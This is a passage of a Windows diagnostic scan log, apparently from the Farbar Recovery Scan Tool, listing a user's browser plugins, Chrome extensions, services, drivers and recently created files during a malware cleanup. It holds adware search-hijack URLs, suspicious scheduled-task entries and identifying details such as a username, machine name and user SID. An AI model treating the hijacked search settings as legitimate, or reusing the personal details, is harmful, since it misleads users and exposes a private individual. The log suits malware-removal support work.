Filter-x32: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
Filter-x32: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-04-08] (Citrix Systems, Inc.)
 
FireFox:
========
FF Plugin: @adobe.com/FlashPlayer -> C:\windows\system32\Macromed\Flash\NPSWF64_16_0_0_305.dll [2015-02-06] ()
FF Plugin: @esn/npbattlelog,version=2.6.2 -> C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelogx64.dll [2015-01-13] (EA Digital Illusions CE AB)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-16] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\windows\SysWOW64\Macromed\Flash\NPSWF32_16_0_0_305.dll [2015-02-06] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2014-02-18] ()
FF Plugin-x32: @Citrix.com/npican -> C:\Program Files (x86)\Citrix\ICA Client\npicaN.dll [2015-04-08] (Citrix Systems, Inc.)
FF Plugin-x32: @esn/npbattlelog,version=2.6.2 -> C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelog.dll [2015-01-13] (EA Digital Illusions CE AB)
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll [2013-10-07] (Google)
FF Plugin-x32: @java.com/DTPlugin,version=11.77.2 -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\dtplugin\npDeployJava1.dll [2016-03-29] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.77.2 -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\plugin2\npjp2.dll [2016-03-29] (Oracle Corporation)
FF Plugin-x32: @messenger.yahoo.com/YahooMessengerStatePlugin;version=1.0.0.6 -> C:\Program Files (x86)\Yahoo!\Shared\npYState.dll [2011-06-16] (Yahoo! Inc.)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-15] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8081.0709 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2009-07-10] (Microsoft Corporation)
FF Plugin-x32: @Motive.com/NpMotive,version=1.0 -> C:\Program Files (x86)\Common Files\Motive\npMotive.dll [2010-11-08] (Alcatel-Lucent)
FF Plugin-x32: @real.com/nppl3260;version=16.0.2.32 -> C:\Users\RoNiN\Netscape6\nppl3260.dll [2013-07-11] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlchromebrowserrecordext;version=1.3.2 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlchromebrowserrecordext.dll [2013-04-16] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlhtml5videoshim;version=1.3.2 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll [2013-04-16] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlpepperflashvideoshim;version=1.3.2 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlpepperflashvideoshim.dll [2013-04-16] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpplugin;version=16.0.2.32 -> C:\Users\RoNiN\Netscape6\nprpplugin.dll [2013-07-11] (RealPlayer)
FF Plugin-x32: @realnetworks.com/npdlplugin;version=1 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\npdlplugin.dll [2013-04-16] (RealDownloader)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-01-31] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-01-31] (Google Inc.)
FF Plugin-x32: @veetle.com/veetleCorePlugin,version=0.9.18 -> C:\Program Files (x86)\Veetle\plugins\npVeetle.dll [2010-10-15] (Veetle Inc)
FF Plugin-x32: @veetle.com/veetlePlayerPlugin,version=0.9.18 -> C:\Program Files (x86)\Veetle\Player\npvlc.dll [2010-09-21] (Veetle Inc)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2013-02-15] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-470165136-1162808608-978993673-1001: @nds.com/PlayerPlugin -> C:\Users\RoNiN\AppData\Local\DIRECTV Player\npPlayerPlugin.dll [2014-03-26] (DIRECTV)
FF Plugin HKU\S-1-5-21-470165136-1162808608-978993673-1001: @tools.google.com/Google Update;version=3 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-01] (Google Inc.)
FF Plugin HKU\S-1-5-21-470165136-1162808608-978993673-1001: @tools.google.com/Google Update;version=9 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-01] (Google Inc.)
FF Plugin HKU\S-1-5-21-470165136-1162808608-978993673-1001: NDS.com/PlayerPlugin -> C:\Users\RoNiN\AppData\Local\DIRECTV Player\npPlayerPlugin.dll [2014-03-26] (DIRECTV)
FF HKLM-x32\...\Firefox\Extensions: [{27182e60-b5f3-411c-b545-b44205977502}] - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension
FF Extension: Search Helper Extension - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension [2010-10-26] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [quickprint@hp.com] - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension
FF Extension: SmartPrintButton - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension [2011-01-26] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{FCE04E1F-9378-4f39-96F6-5689A9159E45}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Extension: RealDownloader - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2013-07-11] [not signed]
 
Chrome: 
=======
CHR DefaultSearchURL: Default -> hxxp://www-searching.com/search.aspx?site=shdefault&prd=smw&pid=s&shr=d&q={searchTerms}&s=Unknown
CHR DefaultSearchKeyword: Default -> www-searching.com
CHR DefaultSuggestURL: Default -> hxxp://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}
CHR Profile: C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-10-09]
CHR Extension: (Google Drive) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-28]
CHR Extension: (YouTube) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-26]
CHR Extension: (Google Search) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-28]
CHR Extension: (MightyText - SMS from PC & Text from Computer) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkfhfaphfkopdgpbfkebjfcblcafcmpi [2016-04-09]
CHR Extension: (Google Cast (Beta)) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\dliochdbjfkdbacpmhlcpmleaejidimm [2016-03-22]
CHR Extension: (Google Calendar) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejjicmeblgpmajnghnpcppodonldlgfn [2015-10-12]
CHR Extension: (Google Play Music) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\fahmaaghhglfmonjliepjlchgpgfmobi [2016-04-09]
CHR Extension: (Google Sheets) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-11]
CHR Extension: (Chrome Remote Desktop) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbchcmhmhahfdphkhkmpfmihenigjmpp [2016-04-09]
CHR Extension: (Google Cast (Beta)) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\gdijeikdkaembjbdobgfkoidjkpbmlkd [2016-03-02]
CHR Extension: (Google Docs Offline) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-22]
CHR Extension: (Google Keep - notes and lists) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\hmjkmjkepdijhoojdojkdfohbdgmmhki [2016-04-07]
CHR Extension: (Facebook Album & Photo Manager) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\lgiedegfmekolcplboelnmfoiefpcpfg [2015-08-15]
CHR Extension: (drumbit) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\mplpmdejoamenolpcojgegminhcnmibo [2016-02-03]
CHR Extension: (WeatherBug) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\njkkjobcechefaoknodniidfjapgfoco [2015-10-12]
CHR Extension: (Chrome Web Store Payments) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-09]
CHR Extension: (Picasa) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\onlgmecjpnejhfeofkgbfgnmdlipdejb [2015-08-15]
CHR Extension: (Gmail) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-08-15]
CHR Extension: (Inbox by Gmail) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkclgpgponpjmpfokoepglboejdobkpl [2015-11-12]
CHR HKLM-x32\...\Chrome\Extension: [gihfmmedoddijgnhkgfgnkeohkpbipol] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [idhngdhcfkoamngbedgpaokgjbnpdiji] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Chrome\Ext\realdownloader.crx [2013-04-16]
 
==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 a2AntiMalware; C:\Program Files\Emsisoft Anti-Malware\a2service.exe [11334288 2016-04-08] (Emsisoft Ltd)
S4 ACDaemon; C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe [113152 2010-03-18] (ArcSoft Inc.)
R2 chromoting; C:\Program Files (x86)\Google\Chrome Remote Desktop\50.0.2661.22\remoting_host.exe [69016 2016-03-08] (Google Inc.)
S4 CLDTVHNService; C:\Program Files (x86)\DirecTV\DirecTV\Kernel\DMP\CLDTVHNService.exe [75048 2009-09-17] ()
S4 ETDService; C:\Program Files\Elantech\ETDService.exe [144104 2015-10-31] (ELAN Microelectronics Corp.)
R2 Fabs; C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\FABS.exe [1253376 2009-08-27] (MAGIX AG) [File not signed]
S4 FirebirdServerMAGIXInstance; C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\fbserver.exe [3276800 2008-08-07] (MAGIX®) [File not signed]
S4 McciCMService; C:\Program Files (x86)\Common Files\Motive\McciCMService.exe [319488 2010-11-08] (Alcatel-Lucent) [File not signed]
S4 McciCMService64; C:\Program Files\Common Files\Motive\McciCMService.exe [517632 2010-11-08] (Alcatel-Lucent) [File not signed]
R2 MDM; C:\Program Files (x86)\Common Files\Microsoft Shared\VS7Debug\mdm.exe [270336 2001-02-23] (Microsoft Corporation) [File not signed]
R2 Micro Star SCM; C:\Program Files (x86)\System Control Manager\MSIService.exe [160768 2009-07-09] (Micro-Star International Co., Ltd.) [File not signed]
S4 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1720608 2014-07-25] (NVIDIA Corporation)
S4 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [18956064 2014-07-25] (NVIDIA Corporation)
R2 pgsql-8.3; C:\Program Files (x86)\PostgreSQL\8.3\bin\pg_ctl.exe [65536 2008-09-19] (PostgreSQL Global Development Group) [File not signed]
S4 RealNetworks Downloader Resolver Service; C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe [39056 2013-04-16] ()
S4 ss_conn_service; C:\Program Files\Samsung\USB Drivers\25_escape\conn\ss_conn_service.exe [745224 2015-07-08] (DEVGURU Co., LTD.)
S4 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [5436176 2015-02-09] (TeamViewer GmbH)
R2 tmInstall; C:\Program Files\Thrustmaster\FFB Racing wheel\drivers\amd64\tmInstall.EXE [50336 2015-09-15] (Thrustmaster®)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-10] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-07-10] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 AnyDVD; C:\Windows\System32\Drivers\AnyDVD.sys [125512 2010-12-01] (SlySoft, Inc.)
R3 AnyDVD; C:\Windows\SysWOW64\Drivers\AnyDVD.sys [125512 2010-12-01] (SlySoft, Inc.)
R3 ArcSoftKsUFilter; C:\Windows\System32\DRIVERS\ArcSoftKsUFilter.sys [19968 2009-05-26] (ArcSoft, Inc.)
S3 BthA2DP; C:\Windows\system32\drivers\BthA2DP.sys [165376 2015-07-09] (Microsoft Corporation)
S3 BthHFAud; C:\Windows\system32\DRIVERS\BthHfAud.sys [36864 2015-07-09] (Microsoft Corporation)
R1 epp; C:\PROGRAM FILES\EMSISOFT ANTI-MALWARE\epp.sys [124080 2016-02-11] (Emsisoft Ltd)
S3 EUCR; C:\Windows\System32\drivers\EUCR6SK.SYS [87888 2009-12-04] (ENE Technology Inc.)
S3 MFE_RR; C:\Users\RoNiN\AppData\Local\Temp\mfe_rr.sys [24120 2016-04-07] (McAfee, Inc.)
S3 MREMP50; C:\Program Files (x86)\Common Files\Motive\MREMP50.sys [21248 2010-11-08] (Printing Communications Assoc., Inc. (PCAUSA)) [File not signed]
S3 MRESP50; C:\Program Files (x86)\Common Files\Motive\MRESP50.sys [20096 2010-11-08] (Printing Communications Assoc., Inc. (PCAUSA)) [File not signed]
S3 NTIOLib_1_0_4; C:\Program Files (x86)\msi\Live Update 5\NTIOLib_X64.sys [14136 2010-10-22] (MSI)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [20256 2014-07-25] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [40392 2014-03-31] (NVIDIA Corporation)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [587264 2015-06-17] (Realtek                                            )
S0 sptd; C:\Windows\System32\Drivers\sptd.sys [834544 2011-02-14] (Duplex Secure Ltd.)
S3 tmbulk; C:\Windows\System32\Drivers\tmbulk.sys [133280 2015-06-30] (© Guillemot R&D, 2015. All rights reserved.)
S3 tmhidusb; C:\Windows\system32\DRIVERS\tmhidusb.sys [170144 2015-09-15] (Thrustmaster)
S3 tmResetMin; C:\Windows\System32\Drivers\tmResetMin.sys [36000 2015-09-15] (© Guillemot R&D, 2013. All rights reserved.)
S3 UdeCx; C:\Windows\System32\drivers\udecx.sys [44032 2015-07-09] ()
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Corporation)
R3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Corporation)
R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Corporation)
U3 idsvc; no ImagePath
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
U3 wpcsvc; no ImagePath
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-04-09 16:22 - 2016-04-09 16:22 - 00016148 _____ C:\WINDOWS\system32\RONIN-LAPTOP_RoNiN_HistoryPrediction.bin
2016-04-09 10:36 - 2016-04-09 10:36 - 00002547 _____ C:\Users\Public\Desktop\TurboTax 2015.lnk
2016-04-09 10:36 - 2016-04-09 10:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TurboTax 2015
2016-04-09 01:20 - 2016-04-09 01:22 - 00000000 ____D C:\Users\RoNiN\Downloads\Cypress Hill - Cypress X Rusko EP (With Rusko)
2016-04-09 00:24 - 2016-04-09 00:31 - 39492246 _____ C:\Users\RoNiN\Downloads\Cypress Hill - Cypress X Rusko EP (With Rusko).zip
2016-04-09 00:02 - 2016-04-09 00:15 - 00000000 ____D C:\Users\RoNiN\Downloads\Weezer - Weezer (White Album)
2016-04-09 00:02 - 2016-04-09 00:12 - 00000000 ____D C:\Users\RoNiN\Downloads\A Tribe Called Quest - The Best Of
2016-04-08 23:28 - 2016-04-08 23:28 - 03119168 _____ C:\Users\RoNiN\Downloads\AdwCleaner.exe
2016-04-08 10:20 - 2001-08-23 13:00 - 00034871 _____ C:\WINDOWS\system32\gpedit.msc
2016-04-08 09:56 - 2016-04-08 09:56 - 00707354 _____ C:\WINDOWS\unins000.exe
2016-04-08 09:56 - 2016-04-08 09:56 - 00001535 _____ C:\WINDOWS\unins000.dat
2016-04-08 09:56 - 2016-04-08 09:56 - 00000000 ____D C:\WINDOWS\SysWOW64\GPBAK
2016-04-08 09:56 - 2008-04-14 02:11 - 00295936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appmgr.dll
2016-04-08 09:56 - 2001-08-23 13:00 - 00034871 _____ C:\WINDOWS\SysWOW64\gpedit.msc
2016-04-07 20:55 - 2016-04-09 16:28 - 00000000 ____D C:\FRST
2016-04-07 18:06 - 2016-04-07 18:08 - 00271216 _____ C:\TDSSKiller.3.1.0.9_07.04.2016_18.06.48_log.txt
2016-04-07 16:15 - 2016-04-09 16:19 - 00000000 ____D C:\AdwCleaner
2016-04-07 15:48 - 2016-04-07 15:48 - 00000490 _____ C:\TDSSKiller.3.1.0.9_07.04.2016_15.48.47_log.txt
2016-04-07 15:05 - 2016-04-07 15:08 - 00270622 _____ C:\TDSSKiller.3.1.0.9_07.04.2016_15.05.40_log.txt
2016-04-07 14:51 - 2016-04-07 14:51 - 00000947 _____ C:\Users\Public\Desktop\Emsisoft Anti-Malware.lnk
2016-04-07 14:51 - 2016-04-07 14:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Emsisoft Anti-Malware
2016-04-05 13:10 - 2016-04-08 15:23 - 00000000 ____D C:\virus
2016-03-29 18:40 - 2016-03-29 18:40 - 00001379 _____ C:\Users\RoNiN\Downloads\,DanaInfo=.avjtwyfrijk8Knrrqq-zSw98+Q29udHJvbGxlci5CQkJZX1hENzZfUFZTX1Bvb2xlZF9TdGF0aWMgJFM1LTE- (10).ica
2016-03-29 18:29 - 2016-03-29 18:29 - 00001379 _____ C:\Users\RoNiN\Downloads\,DanaInfo=.avjtwyfrijk8Knrrqq-zSw98+Q29udHJvbGxlci5CQkJZX1hENzZfUFZTX1Bvb2xlZF9TdGF0aWMgJFM1LTE- (9).ica
2016-03-29 18:21 - 2016-03-29 18:21 - 00001379 _____ C:\Users\RoNiN\Downloads\,DanaInfo=.avjtwyfrijk8Knrrqq-zSw98+Q29udHJvbGxlci5CQkJZX1hENzZfUFZTX1Bvb2xlZF9TdGF0aWMgJFM1LTE- (8).ica
2016-03-29 18:20 - 2016-03-29 18:20 - 00001380 _____ C:\Users\RoNiN\Downloads\,DanaInfo=.avjtwyfrijk8Knrrqq-zSw98+Q29udHJvbGxlci5CQkJZX1hENzZfUFZTX1Bvb2xlZF9TdGF0aWMgJFM1LTE- (5).ica
2016-03-29 18:20 - 2016-03-29 18:20 - 00001379 _____ C:\Users\RoNiN\Downloads\,DanaInfo=.avjtwyfrijk8Knrrqq-zSw98+Q29udHJvbGxlci5CQkJZX1hENzZfUFZTX1Bvb2xlZF9TdGF0aWMgJFM1LTE- (7).ica
2016-03-29 18:20 - 2016-03-29 18:20 - 00001379 _____ C:\Users\RoNiN\Downloads\,DanaInfo=.avjtwyfrijk8Knrrqq-zSw98+Q29udHJvbGxlci5CQkJZX1hENzZfUFZTX1Bvb2xlZF9TdGF0aWMgJFM1LTE- (6).ica
2016-03-29 18:12 - 2016-03-29 18:19 - 59554128 _____ (Citrix Systems, Inc.) C:\Users\RoNiN\Downloads\CitrixReceiver4.2.100 (1).exe
2016-03-29 18:11 - 2016-03-29 18:22 - 00734784 _____ (Oracle Corporation) C:\Users\RoNiN\Downloads\JavaSetup8u77.exe
2016-03-29 18:10 - 2016-03-29 18:10 - 02072960 _____ (Pulse Secure, LLC) C:\Users\RoNiN\Downloads\JuniperSetupClientInstaller.exe
2016-03-24 00:01 - 2016-03-24 00:01 - 04622232 _____ (Google) C:\Users\RoNiN\Downloads\chrome_cleanup_tool (1).exe
2016-03-23 23:06 - 2016-03-29 18:45 - 00002282 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-03-23 23:06 - 2016-03-29 18:45 - 00002270 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-03-23 23:04 - 2016-03-23 23:05 - 00987728 _____ (Google Inc.) C:\Users\RoNiN\Downloads\ChromeSetup (1).exe
2016-03-23 22:36 - 2016-03-23 22:45 - 04584344 _____ (Google) C:\Users\RoNiN\Downloads\chrome_cleanup_tool.exe
2016-03-23 22:26 - 2016-03-23 22:26 - 00987728 _____ (Google Inc.) C:\Users\RoNiN\Downloads\ChromeSetup.exe
2016-03-23 11:41 - 2016-03-23 11:41 - 00001054 _____ C:\Users\RoNiN\Desktop\mwbytescan2016-03-23.txt
2016-03-23 07:41 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\is-BFNHB.tmp
2016-03-22 23:30 - 2016-03-22 23:30 - 00000000 ____D C:\ProgramData\Emsisoft
2016-03-22 21:58 - 2016-04-09 16:24 - 00000000 ____D C:\Program Files\Emsisoft Anti-Malware
2016-03-22 21:12 - 2016-03-23 11:46 - 225721384 ____N (Emsisoft Ltd. ) C:\Users\RoNiN\Desktop\EmsisoftAntiMalwareSetup.exe
2016-03-22 21:04 - 2016-03-22 21:04 - 00000020 ___SH C:\Users\postgres\ntuser.ini
2016-03-22 21:04 - 2016-03-22 21:04 - 00000000 _SHDL C:\Users\postgres\My Documents
2016-03-22 21:04 - 2016-03-22 21:04 - 00000000 _SHDL C:\Users\postgres\Documents\My Videos
2016-03-22 21:04 - 2016-03-22 21:04 - 00000000 _SHDL C:\Users\postgres\Documents\My Pictures
2016-03-22 21:04 - 2016-03-22 21:04 - 00000000 _SHDL C:\Users\postgres\Documents\My Music
2016-03-22 21:02 - 2015-10-03 04:51 - 00000000 ____D C:\Users\postgres\AppData\Roaming\Real
2016-03-22 21:02 - 2015-10-03 04:51 - 00000000 ____D C:\Users\postgres\AppData\Roaming\Media Center Programs
2016-03-22 21:02 - 2015-10-03 04:51 - 00000000 ____D C:\Users\postgres\AppData\Local\NVIDIA Corporation
2016-03-22 21:02 - 2015-10-03 04:51 - 00000000 ____D C:\Users\postgres\AppData\Local\NVIDIA
2016-03-22 21:02 - 2015-10-03 04:51 - 00000000 ____D C:\Users\postgres\AppData\Local\Google
2016-03-22 21:01 - 2016-04-05 12:43 - 00000000 ____D C:\Users\postgres
2016-03-22 20:37 - 2016-03-22 20:37 - 00671442 _____ C:\Users\RoNiN\Desktop\mwbytescan2016-03-22.txt
2016-03-22 18:54 - 2016-03-22 18:54 - 00000000 ___HD C:\$WINDOWS.~BT
2016-03-22 08:01 - 2016-04-08 13:17 - 00003650 _____ C:\WINDOWS\System32\Tasks\CreateExplorerShellUnelevatedTask
2016-03-21 23:37 - 2016-03-29 12:30 - 00000000 ____D C:\WINDOWS\Microsoft Antimalware
2016-03-21 23:03 - 2016-03-21 23:03 - 00001066 _____ C:\malwarebytes scan 2016-03-21.txt
2016-03-21 19:35 - 2016-03-21 19:35 - 00000046 _____ C:\Users\RoNiN\AppData\Roaming\WB.CFG
2016-03-21 19:12 - 2016-03-21 10:23 - 00886256 _____ (Microsoft Corporation) C:\Users\RoNiN\Desktop\mssstool64.exe
2016-03-14 21:33 - 2016-03-14 21:33 - 00000000 ____D C:\Users\RoNiN\AppData\Local\Chromium
2016-03-14 18:48 - 2016-03-14 18:48 - 00000000 ____D C:\WINDOWS\system32\del
2016-03-13 21:32 - 2016-03-13 21:32 - 00000188 _____ C:\WINDOWS\rst30.bat
2016-03-13 19:29 - 2016-03-13 19:38 - 00000000 ___HD C:\ProgramData\wrc
2016-03-13 19:26 - 2016-03-13 19:26 - 00631808 _____ C:\WINDOWS\wrc.dat
2016-03-13 19:23 - 2016-03-21 20:44 - 00000000 ____D C:\Users\RoNiN\AppData\Local\Setup Wizard
2016-03-13 18:52 - 2016-03-13 18:52 - 00003052 _____ C:\WINDOWS\System32\Tasks\Pritc
2016-03-13 18:51 - 2016-03-13 18:51 - 00000229 _____ C:\WINDOWS\DXM.REG
2016-03-13 15:11 - 2016-03-13 15:11 - 00003418 _____ C:\WINDOWS\System32\Tasks\Rocfokt
2016-03-13 14:29 - 2016-04-09 14:33 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-03-13 14:29 - 2016-03-13 14:29 - 00000000 ____D C:\ProgramData\Malwarebytes
